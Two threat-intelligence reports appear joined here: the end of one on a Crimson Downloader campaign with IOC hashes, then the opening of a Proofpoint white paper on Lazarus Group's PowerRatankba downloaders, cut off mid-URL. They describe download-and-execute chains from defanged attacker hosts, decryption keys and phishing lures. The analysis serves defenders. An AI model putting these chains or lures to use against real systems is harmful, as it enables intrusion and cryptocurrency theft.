9a57f96a3fd92b049494807b6f99ffcd6bb9eb81f4f5b352d4b525ad32fac42d
These samples varied in size greatly, however, the underlying shellcode was consistent. One
notable difference observed in one of the samples (0ade05
) was the inclusion of injecting
the shellcode into a newly spawned instance of svchost.exe.
When the shellcode begins, it will start by loading a number of functions that are used to inject
code into svchost.exe. The following Python code demonstrates how this hashing function
operates:
Figure 10 Python code demonstrating API hashing technique #1
The shellcode continues to decrypt a blob of data using a 4-byte XOR key of 0x8F51F053. This
blob contains a series of important strings, such as the URL and filename, as well as functions
that will be used to download the payload.
After this blob is decrypted, flow control proceeds to this blob
s code, where the shellcode will
load multiple libraries and functions using a specific hashing algorithm.
The shellcode continues download a file to the %TEMP% directory from the following URL:
http://subaat[.]com/files/sp.exe
10/17
The shellcode proceeds to execute this newly downloaded file prior to exiting.
Analysis of Malicious Excel Documents
The identified sample that was used in a campaign against a US-based government
organization has the following SHA256 hash:
e3243674aa3661319903a8c0e1edde211f1ffdeed53b305359d3390808007621
When this sample is initially executed, it will attempt to run a malicious macro that is
embedded within the file. This macro begins by determining where a dropped file will reside. It
will attempt to find the following folders residing within a user
s profile path:
/Documents
/Downloads
/AppData
Figure 11 Macro determining file path
The payload itself is stored within text boxes in a user form within the Excel document. This
data is extracted and hex-decoded. The three blobs of data are concatenated to form a proper
PE32 executable.
11/17
Figure 12 Macro loading data from text boxes
A quick look at the included user form gives us a better view as to how this data is stored.
12/17
Figure 13 Embedded user form with three text boxes
The following example Python code demonstrates the hex-decoded data shown in the
highlighted text box above.
Figure 14 Python code hex-decoding the stored data
After this data is properly handled, the macro will drop this file with an extension of .scr to the
designated file path. It is then executed in a new process. This newly spawned process is an
instance of the Crimson Downloader malware family.
13/17
SHA256 Hashes
c4c478c5486a09ac06e657ace2c1edb00cc690a2ff3558598e07687aa149df71
6b6ff0bef244732e90e7a8c200bcd1d8db6f58fe4da68889eb847eb1b6458742
07cb90288ae53643a4da291863df6c9be92bfd56b953073e30b7c28c777274fc
66ef8f3660902cba0ca9bebd701d322aff1d5a13de0cf63cf3f1b8841e08efc6
20c949ca25fed25918e524dde67ffe44efb1c974a5ed68d519b77354303c4916
007e4b308a69d6c3dba5a01f754a63231b996f1a68ff43ec9b5906f583f0fc6b
f7d2f547d5ab07abf59f97fb069288d682a20bc9614642777d11c7db76b36f39
20e368b0d0288b968fed7193c965a7c7ecf3e731eb93a4cbd4420242fad7ce8c
9ddc4ba7a8025598b6a8344c5537af3e2ae6e6db8356dcbfc9ad86b84dee87af
95c00b3de53c0b5742c182f9221a3086bf046ad8da57c915e8c0b6dc5180fd7f
0804202f46dc94768820cb0915b8d2b36602575ac78e526ea7f518e584069242
914b6f21297ebb81621b6da00edcda59b4c1fdd06329ed7a587c9a9b09915583
2a73231d0480f7481737256a8dca6b2549db982cc10f1761c2a267eb85dcaca4
67d4ab365f1630e750aee300f14fbfc940ea235647014030bd56c4127933834b
41efb2f1cb81160539058d8fc2ca8c037692803dcb8b332c660233bffe5bf874
e51b8bf7cc72b47c8ee59056fabd2af1795152d8df33967949d2d2a0996cc51b
4c6f7aafc2e4d8b0b7e7f21cbb102e02dc314eeb2f8e754f59ea471f58cabda0
3a664210955a82d961480adcc914456931325268ccf26c09d0275ca1d2ff35f1
5cc14c2bc185121391a7c43e3e65ced4697274e93fe42f28f20c067dde7e9f1d
f19480d36453da029247fbd066c7f0c1b28912bbefafd052b1d4ee9a64eb9e31
6bbb87f05d9d987a3df3bb585de3f2fad5d5cd3f11a0e3c4587255c55a9fe2a5
75da69e466183b0d004719d32f779cd5b7849a6dac0b6303e11db543c0ddec32
a0a2edcd19a581aeba3de5bbca21065425fbf34fd1a798269ff99bd8af8bf847
2c34565535a0f90b469f0e100d9027190d3cd812bd824aa6af73b4884690a395
50c4f3d3335daf84d507ed2663a411d2ce39e9def172ddbaf7ade0f2ce0f2736
14/17
a8445387cb7e4bc79da34d371eedf50f265e145ce8f48c64aeff2690ed7f8b10
7218bc4e9b8817eff678422a9125a852c3f66ecf275aa691433dd8cd4910f66d
106938bff25de67513acc809c4c77b2aa9e9974ec8bf4d20bad154015abc77be
85116c4f9695bf15fe3fdcb20cff8634971e39c2b97b1a159446fa6cdf05e913
253bb91003a8c295a70240206605542147d7b9fdc2d26ac999772b3b78db3a80
2d5abd4cc322d5802617d6a1cd3fc22403052e2711bf6bd76976ab7d1cea45cf
e0d6e8584f2d3d6d807ad2fe9d2fccc792635e8e3ab0132f3b5dedc0394019c9
625f30d4abd89b94c1f732463202c51cd9424a1bcbf2e72a9779773c0f82f93c
6807c25ead1c377c975c84a214da8a68482623658369a02ce56b531d6f38a5b6
dfb984ea975ca992e1a0f9a6d30a41057edd36b170704b7831f609f44f80ad8d
ed9fb1d8c36fb60c808006ae63908980a259cb73ed44adf19856ea6c239d1eab
1f286fff72a562cd327985a1b57316364710f2cbfeedc46d12dc8d21b4611ecb
4da2fd94b4f21a346ebfa5d8793dd60a1d4200dfe6b91517a70aed4c0b59a4d4
983bc61d569839558e2a2ef2a53174efe45be4e65da991268ce1926beb4e3505
7b1ab4513788ef4b6628911ba6ed6362eb357b66d18f6988fb4ceffb20ee1d91
8c93d054d4ef93f695da9693f6de538e269b39320c934428f27cc22ef6b2d89e
cd873eaded83861c4f59bfb5c902b43bfd7f5ecb13eccc385498ad9564085e97
e63f0ab5413b0013d79c57f8132c21c0c9397c88caa01edbb4fbe6c2db4932a0
24bc5f9aa78d91d6c8641b90cac6d3c3e7ddf4b30a992a9129d73c5edb04f80f
89ac4eeaecd38fcb2eb8e0bacd156b6133a6093f44622f7d82e22493a69cafb7
07abc1eb421baffe4f894406c1435b3daf8d1dcfba53d8e4e8f584cf72d08110
2941360679ea485798e324e3538c358cf6cba65959ebf28df9fd4a5492bf2888
dbac3abbaaea59c8287d3ed47cac07aeca952a3620eda4559c2bf0f3f611d52e
efca910066b59ca833c7291d07f18922cf5e3e2301c5fd95b7acd50f195fc580
a331276b9810ebc131daf883887a0ba8ab0fb5e6ea4671b12249c1be1755fce8
31d94441009e7ea50d880e1dcc9e09890f1139bce9edc847b05f2c5ac355695e
15/17
c3eeb0677dcbfe4edb6cca9c5bac34ae80a5906b76676548ef0e5110f3ddd4c3
e68ea3c3c9bb0d5b0d4f940b0cbbfb6913a47bb6f345b54f487241fc4eec4b31
83810647cd0c398ad05dec63c41756bf5fbfd1b0658379753c157e7b1f45aed3
dfb4f62c609be0295ef1c4fcd59c5897fbd0ad40a82d00a93e7f3bdadcc1d320
23180df75c5b9293f3743ea27c09ce471f1f5541cd668ac22c16e41f1ff7b4da
ef09065b95d0ea2e02384828e5616fc6f9ededadb2b4719078904c50d2ed4307
923818d36ff1fd94829424847ac20ab7d77432b133cdb5cb1a1be87ec0e1b617
4cbc47fe5d82145265e8dbc9e81ab6afa9a0a4f3c6dd8c15ce2af09584278517
670e45f3e2fbb635df00790d90a5cf8bc950440a935b38c2bb71f0c463c24b3b
2551d883d3e66a3e7bcabc052be2e503808df570c03d816ddfb83bf6e686a5f6
712a8fa4308de2ba1a83545e96539092215c75bfa8b63b33ee1a739cc6522873
7e09b6d96d7034f1ac5947355dba360cc49f53d4c0c89aab05c1ef6cc2d0a213
801bb690dd2ecd3877b014030dfca40f3b7d964fdb8e1ab1252352212e24f777
fae9b4a92277e227f6122794ef366dba49c045add9569e9a0d8fc66196c5c787
2bfbd56ee421b8aab3dd3d1f9e9a2d512556a4e0440c8f04e94d6ad5b584e43c
35bc123df7bfc8f9239af3fa14350091c513e7b1d42b93a8dca39e131c48c052
87d122b7b99735689713ff51650b6a331d9c4d7f7617fc15b7e07b0225b60c2a
0b2a6225d209783672900d1b8e0b19957cb924f0111d0be347dead9520ad745a
5f3845a1e3d2f3d09c3ffff4a71e04f61d995aae54311d4c9ab88ff65803d131
5c361d57ac83936d08c4a93208142b7397d6074bbf6e24cb6cee0e3e3e5351b3
ea35cf979b358c1661b4b1b9465a700925bdf4ba227989b47127270e32345f29
44963748c947e0f5d21d353e6e5ceb3b6a64fd0b4ad28540ab47bdf2422e9523
1d4f20832e641a1cedd598e187614b78ba3d5930c6dcd71e367b254664cb9b2e
050123edd0d9ea5acf32314aa500467211d8f204f57627abc42937fe11f04382
4c806d18ba1cac5d83be7c05f43697d5124b910d2de8264cdff1d8f186a0a7dd
aec031e3747b00be2b0cc3a1d910ae18ada65452f3e70425cae86fe24d2996d4
5ac984bb11b989ef745c35dd2418eb5bd26a6bba291cf2ba7235bf46d3400260
16/17
0ade053b355eca7ae1fccea01fe14ff8d56a9d1703d01b3c00f7a09419357301
e3243674aa3661319903a8c0e1edde211f1ffdeed53b305359d3390808007621
9a57f96a3fd92b049494807b6f99ffcd6bb9eb81f4f5b352d4b525ad32fac42d
7bad7cbc32e83b8dfc4f6c95824ea45dcee2330de44d84c9bc551f99e6ca6faa
341403284158723f1f94897d257521a73fcfc8049b786f5004f60a063fb074f2
f68a169670bb3dc3bd0a2dc83120d34f59d7f4dacfdc98dbbd86931cdd4f7392
579c669bd8ec8dd393a836c6c27c86e40e8048fa5efbcfc03e027e69298f0e6a
19df2d2460be2f22f73ea7992470c5369599fba290c0f3dbc613ad35dc3ba18a
692997349c017c627c8779816bc41840dd7867b0c4d3bec99638bfba159675bc
c0658b5aa4e9bc2433557e65ad20ded6f91b3441dac72cb8c2ea7e1f2e43e05e
IP Addresses
5.189.157[.]215
115.186.136[.]237
Domains
subaat[.]com
hassanusauae786.hopto[.]org
17/17
White paper
North Korea
Bitten by
Bitcoin Bug
Financially motivated campaigns
reveal new dimension of the
Lazarus Group
Darien Huss
www.proofpoint.com
Table of Contents
EXECUTIVE SUMMARY........................................................................................................................................................... 3
OVERVIEW............................................................................................................................................................................... 4
INTRODUCTION...................................................................................................................................................................... 4
PowerRatankba Downloaders......................................................................................................................................5
Campaign Timeline.................................................................................................................................................................... 5
PowerSpritz................................................................................................................................................................................ 6
Windows Shortcut (LNK)............................................................................................................................................................ 8
Microsoft Compiled HTML Help (CHM)..................................................................................................................................... 9
JavaScript Downloaders.......................................................................................................................................................... 11
VBScript Macro Microsoft Office Documents.......................................................................................................................... 13
Backdoored PyInstaller Applications....................................................................................................................................... 15
Implant Description and Analysis..............................................................................................................................18
PowerRatankba Description..................................................................................................................................................... 18
PowerRatankba.A C&C Description......................................................................................................................................... 19
PowerRatankba.B C&C Description........................................................................................................................................ 20
PowerRatankba Persistence.................................................................................................................................................... 20
PowerRatankba.B Stage2 - Gh0st RAT.................................................................................................................................... 21
Gh0st RAT Purpose.................................................................................................................................................................. 23
Shopping Spree: Enter RatankbaPOS..................................................................................................................................... 23
RatankbaPOS Analysis............................................................................................................................................................ 23
RatankbaPOS Targeted Region............................................................................................................................................... 28
Attribution to Lazarus Group......................................................................................................................................28
Encryption................................................................................................................................................................................ 28
Obfuscation.............................................................................................................................................................................. 30
Functionality............................................................................................................................................................................. 30
Code Overlap........................................................................................................................................................................... 31
Decoys..................................................................................................................................................................................... 32
C&C.......................................................................................................................................................................................... 32
CONCLUSION........................................................................................................................................................................ 33
Research Contributions........................................................................................................................................................... 33
Indicators of Compromise (IOCs)............................................................................................................................................ 34
ET and ETPRO Suricata/Snort Signatures............................................................................................................................... 37
North Korea Bitten by Bitcoin Bug
Executive Summary
With activity dating at least to 2009, the Lazarus Group has consistently ranked among the most disruptive, successful,
and far-reaching nation-state sponsored actors. The March 20, 2013 attack in South Korea, the Sony Pictures hack in 2014,
the successful theft of $81 million from the Bangladesh Bank in 2014, and perhaps most famously this year
s WannaCry
ransomware attack and its global impact have all been attributed to the group. The Lazarus Group is widely accepted as
being a North Korean state-sponsored threat actor by numerous organizations in the information security industry, law
enforcement agencies, and intelligence agencies around the world.
The Lazarus Group
s arsenal of tools, implants, and exploits is extensive and under constant development. Previously,
they have employed DDoS botnets, wiper malware to temporarily incapacitate a company, and a sophisticated set of
malware targeting the SWIFT banking system to steal millions of dollars. In this report we describe and analyze a new,
currently undocumented subset of the Lazarus Group
s toolset that has been widely targeting individuals, companies, and
organizations with interests in cryptocurrency.
Threat vectors for this new toolset, dubbed PowerRatankba, include highly targeted spearphishing campaigns using
links and attachments as well as massive email phishing campaigns targeting both personal and corporate accounts of
individuals with interests in cryptocurrency. We also share our discovery of what may be the first publicly documented
instance of a nation-state targeting a point-of-sale related framework for the theft of credit card data, again using a variant
of malware that is closely related to PowerRatankba.
North Korea Bitten by Bitcoin Bug
Overview
The Lazarus Group has increasingly focused on financially motivated attacks and appears to be capitalizing on both the
increasing interest and skyrocketing prices for cryptocurrencies. Proofpoint researchers have uncovered a number of
multistage attacks that use cryptocurrency-related lures to infect victims with sophisticated backdoors and reconnaissance
malware. Victims of interest are then infected with additional malware including Gh0st RAT to steal credentials for
cryptocurrency wallets and exchanges, enabling the Lazarus Group to conduct lucrative operations stealing Bitcoin and
other cryptocurrencies. We also discovered what appears to be the first publicly documented instance of a nation-state
targeting a point-of-sale related framework for the theft of credit card data in a related set of attacks. Moreover, the timing of
the point-of-sale related attacks near the holiday shopping season makes the potential financial losses considerable.
Introduction
It is already well-known that Lazarus Group has targeted and successfully breached several prominent cryptocurrency
companies and exchanges. From these breaches, law enforcement agencies suspect that the group has amassed nearly
$100 million worth of cryptocurrencies based on their value today. We hypothesize that many of these previously reported
operations targeting cryptocurrency organizations have actually been conducted by the espionage team of the Lazarus
Group based on evidence we provide in the Attribution section. Further, we assess that until today, many of Lazarus
Group
s traditional financially motivated team have remained largely in the shadows as they conduct these operations
adding to their already impressive stockpile of various cryptocurrencies.
Several watering hole attacks targeting the banking and financial industries that occurred at the end of 2016 and beginning
of 2017 utilized a first stage downloader implant dubbed Ratankba. During those incidents, Lazarus Group primarily used
Ratankba as a reconnaissance tool, described by colleagues at Trend Micro as a utility to
survey the lay of the land.
this research we detail a new implant dubbed PowerRatankba, a PowerShell-based malware variant that closely resembles
the original Ratankba implant. We believe that PowerRatankba was likely developed as a replacement in Lazarus Group
strictly financially motivated team
s arsenal to fill the hole left by Ratankba
s discovery and very public documentation
earlier this year.
In this report, we first provide a brief timeline of events related to the malicious activity. Next, we describe the various
delivery methods that Lazarus Group utilized to infect victims with PowerRatankba (Fig. 1). We then detail the inner
workings of PowerRatankba and how it is utilized to deliver a more fully capable backdoor to interesting victims (Fig. 1).
Following that, we share details on a new and emerging threat targeting the South Korean point-of-sale industry that we
have dubbed RatankbaPOS (Fig. 1). Finally, we explain our high-confidence attribution to Lazarus Group.
North Korea Bitten by Bitcoin Bug
Figure 1: Flow of PowerRatankba activity from victims to the Lazarus Group operators
PowerRatankba Downloaders
In this section we will detail each of the different attack vectors and campaigns we have discovered that eventually lead to
the delivery of PowerRatankba. In total we have discovered six different attack vectors:
A new Windows executable downloader dubbed PowerSpritz
A malicious Windows Shortcut (LNK) file
Several malicious Microsoft Compiled HTML Help (CHM) files using two different techniques
Multiple JavaScript (JS) downloaders
Two macro-based Microsoft Office documents
Two campaigns utilizing backdoored popular cryptocurrency applications hosted on internationalized domain (IDN)
infrastructure to trick victims into thinking they were on a legitimate website
Campaign Timeline
The campaigns discussed in this research began on or around June 30th, 2017. According to our data those campaigns
were highly targeted spearphishing attacks targeting at least one executive at a cryptocurrency organization to deliver a
PowerRatankba.A variant. All other campaigns utilized PowerRatankba.B variants. We currently have no visibility into how
the LNK, CHM, and JS campaigns were delivered to users, but given common Lazarus modus operandi, we can speculate
that they may have been delivered through attachments or links in emails. We gained visibility again during the massive
email campaigns utilizing BTG- and Electrum-themed applications to ultimately deliver PowerRatankba. The timeline below
illustrates the exact dates of campaigns where we are aware of them. Where exact dates are unknown, we based estimates
on first campaign observations and metadata (Fig. 2).
North Korea Bitten by Bitcoin Bug
Figure 2: Timeline of campaigns ultimately related to PowerRatankba
PowerSpritz
PowerSpritz is a Windows executable that hides both its legitimate payload and malicious PowerShell command using
a non-standard implementation of the already rarely used Spritz encryption algorithm (see the Attribution section for
additional analysis of the Spritz implementation). This malicious downloader has been observed being delivered via
spearphishing attacks using the TinyCC link shortener service to redirect to likely attacker-controlled servers hosting the
malicious PowerSpritz payload. In early July 2017 an individual on Twitter shared an attack they observed targeting them
(Fig. 3) utilizing a fake Skype update lure to trick users into clicking on a link to hxxps://skype.2[.]vu/1. The TinyCC link
redirected to a server that, at the time, would have likely returned a PowerSpritz payload: hxxp://201.211.183[.]215:8080/
update.php?t=Skype&r=update
Figure 3: PowerSpritz spearphishing email shared on Twitter by @LeoAW, abusing Skype name and branding
North Korea Bitten by Bitcoin Bug
We have since discovered three additional TinyCC URLs utilized to spread PowerSpritz: one with a Telegram theme (hxxp://
telegramupdate.2[.]vu/5 -> hxxp://122.248.34[.]23/lndex.php?t=Telegram&r=1.1.9) and two more with Skype theme
(hxxp://skypeupdate.2[.]vu/1 -> hxxp://122.248.34[.]23/lndex.php?t=SkypeSetup&r=mail_new and hxxp://skype.2[.]vu/k
-> unknown). Some of the PowerSpritz payloads were previously hosted on Google Drive; however, we were unable to
determine if that service was actually used to spread the payloads in-the-wild (ITW).
PowerSpritz decrypts a legitimate Skype or Telegram installer using a custom Spritz implementation with the key
Znxkai@
if8qa9w9489
. PowerSpritz then writes the legitimate installer to disk in the directory returned by GetTempPathA either as
a hardcoded filename such as SkypeSetup.exe or, in some versions, as the filename returned by GetTempFileNameA.
The installer is then executed to trick the potential victim into thinking they downloaded a legitimate, working application
installer or update. Finally, Spritz uses the same key to decrypt a PowerShell command that downloads the first stage of
PowerRatankba (Fig. 4). All three PowerSpritz samples we discovered executed the identical PowerShell command.
Figure 4: Script output showing PowerSpritz PowerShell encoded and decoded command
North Korea Bitten by Bitcoin Bug
As shown in the above decoded script (Fig. 4), PowerSpritz attempts to retrieve a payload from hxxp://dogecoin.
deaftone[.]com:8080/mainls.cs that is expected to be a Base64-encoded PowerShell script. After decoding mainls.cs,
a PowerRatankba.A implant is revealed (Fig. 5) with hxxp://vietcasino.linkpc[.]net:8080/search.jsp as its command and
control (C&C).
Figure 5: PowerSpritz retrieving Base64-encoded PowerRatankba
Windows Shortcut (LNK)
A LNK masquerading as a PDF document was discovered on an antivirus
scanning service. The malicious
Scanned Document Part 1.pdf.lnk
LNK file, along with a corrupted PDF named
Scanned Document Part
2.pdf,
were compressed in a ZIP file named
Scanned Documents.zip
(Fig. 6). It is unclear if the PDF document was tampered with intentionally
to increase the chances a target would open the malicious LNK or if the
actor(s) unintentionally used a corrupted document. We currently are not
aware of how the LNK or compressed ZIP files were utilized ITW.
Figure 6: ZIP file with decompressed
malicious LNK and corrupted PDF
The malicious LNK uses a known AppLocker bypass to retrieve its
payload from a TinyURL shortener link hxxp://tinyurl[.]com/y9jbk8cg (Fig.
7). This shortener previously redirected to hxxp://201.211.183[.]215:8080/
pdfviewer.php?o=0&t=report&m=0 . At the time of analysis the C&C
server was no longer returning payloads. However, the same IP was
used in the PowerSpritz campaigns. Based on the same C&C usage
and similar URI structure, we assess with low confidence that the LNK
campaign would have delivered PowerRatankba via PowerSpritz.
Figure 7: Malicious LNK AppLocker bypass to retrieve payload
North Korea Bitten by Bitcoin Bug
Microsoft Compiled HTML Help (CHM)
Several malicious CHM files were uploaded to a multi antivirus scanning service in October, November, and December. We
inspected the compressed ZIP metadata to better understand the likely chronological order in which the CHMs were used.
Unfortunately we have been unable to determine how these infection attempts were delivered to victims ITW. The themes of
the malicious CHMs include:
A confusing, poorly written request for assistance with creating a website with possible romantic undertones (Fig. 8-1)
Documentation on a blockchain technology called ALCHAIN from Orient Exchange Co. (Fig. 8-2)
A request for assistance in developing an initial coin offering (ICO) platform (Fig. 8-3)
White paper on the Falcon Coin ICO (Fig. 8-4)
A request for applications to develop a cryptocurrency exchange platform (Fig. 8-5)
A request for assistance in creating an email marketing tool (Fig. 8-6)
Figure 8: CHM lures utilized in attempts to deliver PowerRatankba
All of the CHM files use a well-known technique to create a shortcut object capable of executing malicious code and then
causing that shortcut object to be automatically clicked via the
x.Click();
function. Two different methods were used
across the CHMs to retrieve the malicious payload.
The first method uses a VBScript Execute command and BITSAdmin tool to download a malicious VBScript file (Fig.
9). The payload is downloaded (Fig. 10) from hxxp://www.businesshop[.]net/hide.gif and saved to C:\windows\temp\
PowerOpt.vbs. Once the downloaded VBScript (Fig. 10) is executed, it will attempt to download PowerRatankba from
hxxp://158.69.57[.]135/theme.gif, saving the expected PowerShell script to C:\Users\Public\Pictures\opt.ps1.
North Korea Bitten by Bitcoin Bug
Figure 9: Malicious code embedded in CHM to download a VBScript PowerRatankba downloader
Figure 10: BITSAdmin retrieving malicious payload over HTTP
North Korea Bitten by Bitcoin Bug
Figure 10: BITSAdmin retrieving malicious payload over HTTP
The second method downloads a similar VBScript-based PowerRatankba downloader using PowerShell directly in the
CHM (Fig. 11). A similar VBScript Execute command is utilized to call PowerShell
s DownloadString to execute the payload
directly from hxxp://92.222.106[.]229/theme.gif
Figure 11: PowerShell utilized in CHM to retrieve PowerRatankba downloader VBS
The 5_6283065828631904327.chm (030b4525558f2c411f972d91b144870b388380b59372e1798926cc2958242863)
contains notable pieces of unused code as well as code pointing to an RFC1918 private IP address in the decompressed
doc.htm file (Fig. 12). The first excerpt of unused code consists of a more traditional PowerShell command that downloads
a script from hxxp://192.168.102[.]21/power.ps1. The next block of code adds an obfuscation technique (also present in
other related CHMs) where the quotes are replaced with the
character. This obfuscated code downloads a PowerShell
payload from the same RFC1918 address but from a different URI: hxxp://192.168.102[.]21/pso.ps1. We assess that this
is likely a remnant of the author developing the malicious CHM method using their local environment rather than using
code stolen from an unrelated CHM, tool, or other malicious payload. Additionally, another piece of commented code
follows which executes a VBScript file
C:\Users\dolphinePC\Downloads\run_32.vbs
. This may offer another clue to the
developer
s environment that has a possible username of dolphinePC. Finally, a PowerRatankba.B implant was embedded
in the same CHM as aa.ps1 and configured with C&C servers of 92.222.106[.]229 and 158.69.57[.]135.
Figure 12: Leftover code in 5_6283065828631904327.chm
As a final note on the CHM campaigns, the following three samples contain an email address of either robert_mobile@
gmail[.]com or robert_mobile@mail[.]com, which we assess with some confidence are related to the threat actor:
772b9b873100375c9696d87724f8efa2c8c1484853d40b52c6dc6f7759f5db01
6cb1e9850dd853880bbaf68ea23243bac9c430df576fa1e679d7f26d56785984
9d10911a7bbf26f58b5e39342540761885422b878617f864bfdb16195b7cd0f5
JavaScript Downloaders
Throughout November several compressed ZIP files containing a JavaScript (JS) downloader were observed being hosted
on likely attacker-controlled servers. We are not currently aware if or how these files were delivered to potential victims. The
naming of the files and the decoy PDF documents they retrieve provide some clues about the nature of the lures. Themes
include the cryptocurrency exchanges Coinbase and Bithumb, the Falcon Coin ICO, and a list of Bitcoin transactions.
Each JavaScript downloader is obfuscated (Fig. 13) using JavaScript Obfuscator (see Attribution section for additional
analysis) or a similar tool. After de-obfuscating (Fig. 14), the logic of the malicious downloader is very straightforward. First,
an obfuscated PowerRatankba.B PowerShell script is downloaded from a fake image URL such as: hxxp://51.255.219[.]82/
theme.gif. Next, the PowerShell script is saved to C:\Users\Public\Pictures\opt.ps1 and then executed.
North Korea Bitten by Bitcoin Bug
Figure 13: Obfuscated falconcoin.js
Figure 14: Deobfuscated falconcoin.js revealing PowerRatankba and decoy PDF URLs
The last step in execution is to retrieve the decoy PDF from hxxp://51.255.219[.]82/files/download/falconcoin.pdf and open
it using rundll32.exe and shell32.dll,OpenAs_RunDLL (Fig. 15-1). Samples using Coinbase and Bithumb themes also
downloaded PDF decoys (Fig. 15-2,15-3). Additionally we discovered that the content from the Coinbase decoy has been
used in Lazarus group-attributed espionage campaigns (see Attribution for more details).
North Korea Bitten by Bitcoin Bug
Figure 15: Decoys downloaded or sent along with PowerRatankba JavaScript downloaders
VBScript Macro Microsoft Office Documents
Two VBScript macro-laden Microsoft Office documents have been observed associated with this activity: one Word
document and one Excel spreadsheet. The Word document (b3235a703026b2077ccfa20b3dabd82d65c6b5645f7f1
5e7bbad1ce8173c7960) uses an Internal Revenue Service (IRS) theme and was sent as an attachment named
report
phishing.doc
. The spearphishing email was sent from an @mail.com address with the subject of
Phishing Warnning
[sic].
Ironically, the sender email address was spoofed as phishing@irs.gov (Fig. 16) while the content of the lure (Fig. 17) was
likely copied from an official IRS webpage.
Figure 16: Spearphishing email spoofed sender
and subject
Figure 17: IRS themed Word document PowerRatankba
downloader
The IRS-themed malicious document uses a macro
to download a PowerRatankba VBScript from
hxxp://198.100.157[.]239/hide.gif (Fig. 18), save it to C:\
Users\Public\Pictures\opt.vbs, and execute it with wscript.
exe. It in turn downloads the PowerRatankba.B from
hxxp://198.100.157[.]239/theme.gif, saving the downloaded
payload to C:\Users\Public\Pictures\opt.ps1, and finally
executing it with powershell.exe.
North Korea Bitten by Bitcoin Bug
Figure 18: IRS-themed malicious document macro
The second malicious Office document we discovered is an Excel spreadsheet named bithumb.xls. It uses a Bithumb lure
(Fig. 19) and includes stolen branding. The spreadsheet was found compressed in a ZIP file named Bithumb.zip along with
a decoy PDF document named
About Bithumb.pdf
(Fig. 20).
Figure 19: Malicious Bithumb Excel spreadsheet with English option shown, with stolen branding
Figure 20:
About Bithumb.pdf decoy
document inside Bithumb.zip archive, with stolen branding
The Excel spreadsheet contains a macro with an embedded Base64-encoded PowerRatankba VBScript downloader
(rather than retrieving it from a C&C using HTTP (Fig. 21)). The embedded VBScript is first dropped to disk at c:\Users\
Public\Documents\Proxy.vbs and then executed using wscript.exe. The dropped VBScript file is configured to download
PowerRatankba from hxxp://www.energydonate[.]com/images/character.gif while saving the downloaded payload to C:\
Users\Public\Documents\ProxyAutoUpdate.ps1.
North Korea Bitten by Bitcoin Bug
Figure 21: Base64 encoded PowerRatankba downloader embedded in bithumb.xls
Backdoored PyInstaller Applications
Most recently, several large email phishing campaigns attempted to trick unsuspecting victims into visiting fake webpages
to download or update cryptocurrency applications. The copycat websites were mirror images of legitimate websites with
software download links pointing to the correct installers hosted on the legitimate websites. The only exception was the
link to download the Windows version of the application, which was hosted on the copycat websites. These PyInstaller
executables were backdoored with a few lines of Python code added to download the PowerRatankba implant.
The first campaign that utilized this technique used a Bitcoin Gold (BTG) theme to trick the targets into visiting an
internationalized domain name (IDN) website (Fig. 22). An email was sent to targets offering a BTG wallet application
along with a link to the malicious website: hxxps://xn--bitcoingld-lcb[.]org/. However, web browsers and email clients would
display the link as follows: hxxps://bitcoing
ld[.]org/. Emails in this BTG campaign were sent between approximately
November 10-16, 2017. Some of the known sender emails include but are not limited to: info@xn--bitcoingod-8yb[.]com,
info@xn--bitcoigold-o1b[.]com, and tech@xn--bitcoingld-lcb[.]org. Campaigns using IDN can be difficult to recognize as
malicious because they are typically very similar to the mimicked legitimate domains except for a single character (Fig. 23).
(see IOC section for more likely related IDNs)
Figure 22: Sample email containing a URL to malicious IDN hosting PyInstaller PowerRatankba downloader. The
North Korea Bitten by Bitcoin Bug
IDN email address is emphasized in a red box.
Figure 23: Excerpt from phishing email showing the IDN link
with red arrow pointing to internationalized character
Many thanks to Yonathan Klijnsma (@ydklijnsma) of RiskIQ,
whose assistance allowed us to analyze a historical scrape of
one of the web pages hosting the malware at xn--bitcoingldlcb[.]org. In the scrape, an additional text and a button were
inserted in place of the BTG logo. The button used JavaScript to
download a payload from hxxps://bitcoing
ld[.]org/bitcoingold.
exe (IDN: xn--bitcoingld-lcb[.]org) (Fig. 24). Additional
differences are likely the result of changes to the legitimate
website (Fig. 25) since the malicious campaign.
Figure 24: Malicious BTG website hosting
PowerRatankba downloader. Credit: RiskIQ
North Korea Bitten by Bitcoin Bug
Figure 25: Legitimate BTG website showing difference
between legitimate and malicious websites (note: this
screenshot was not taken on the same day as the
screenshot of the malicious website)
Once clicked, the button on the malicious BTG page would have directed a victim to download a payload
from hxxps://bitcoing
ld[.]org/bitcoingold.exe. At the time of our analysis, this URL was not returning content.
However, we discovered from a comment on a multiple anti-virus scanning service that someone targeted
by this campaign had uploaded a payload downloaded from the fake website. The file in that case was
named ElectronGold-1.1.1.exe (eab612e333baaec0709f3f213f73388607e495d8af9a2851f352481e996283f1).
We also found a similar payload with unknown origin named ElectronGold-1.1.exe
(b530de08530d1ba19a94bc075e74e2236c106466dedc92be3abdee9908e8cf7e).
The second campaign we discovered used a fake Electrum update as the lure to similarly direct victims to a malicious IDN
resembling the legitimate electrum.org website (Fig. 26). The emails in this case were sent, based on our visibility, using a
unique @mail.com email address for each recipient, and at least some of the emails were sent between November 18-21,
2017. A subject of
New Electrum Wallet Released
was used to trick victims into thinking that they needed to download
an update for Electrum to be able to use Segwit2X and Bitcoin Gold. If a victim clicked on the malicious link, they were
presented with what appeared to be a normal version of Electrum
s official website (Fig. 27).
Figure 26: Phishing email with fake Electrum
wallet application update announcement
Figure 27: A fake website with links to backdoored installation
packages highlighted in red boxes and internationalized
character noted by red arrow
Each of the links highlighted in red led to a malicious payload hosted directly on the same server: hxxps://xn--electrms2a[.]org/electrum-3.0.3.exe (Fig. 28). The electrum-3.0.3.exe is a backdoored PyInstaller that is configured to download a
VBScript PowerRatankba downloader.
North Korea Bitten by Bitcoin Bug
Figure 28: HTML code from malicious Electrum webpage
In both campaigns, the same malicious Python code was injected into the PyInstallers, specifically into \gui\qt\installwizard.
py. The backdoor code in each campaign is nearly identical except for the target URL and the file name to which the
downloaded VBScript is saved (Fig. 29).
Figure 29: Side-by-side comparison of backdoored installwizard.py scripts. Left: BTG, Right: Electrum
The BTG campaign was configured to download a VBScript from hxxp://www.btc-gold[.]us/images/top_bar.gif while
saving the downloaded script to C:\Users\Public\Documents\diff.vbs. We were unable to retrieve this file but suspect a
PowerRatankba variant would have been downloaded based on other campaigns.
The Electrum campaign was similarly configured to download a VBScript; however, in this case we were able to analyze the
downloaded payload. The backdoored installwizard.py downloaded a script from hxxp://trade.publicvm[.]com/images/top_
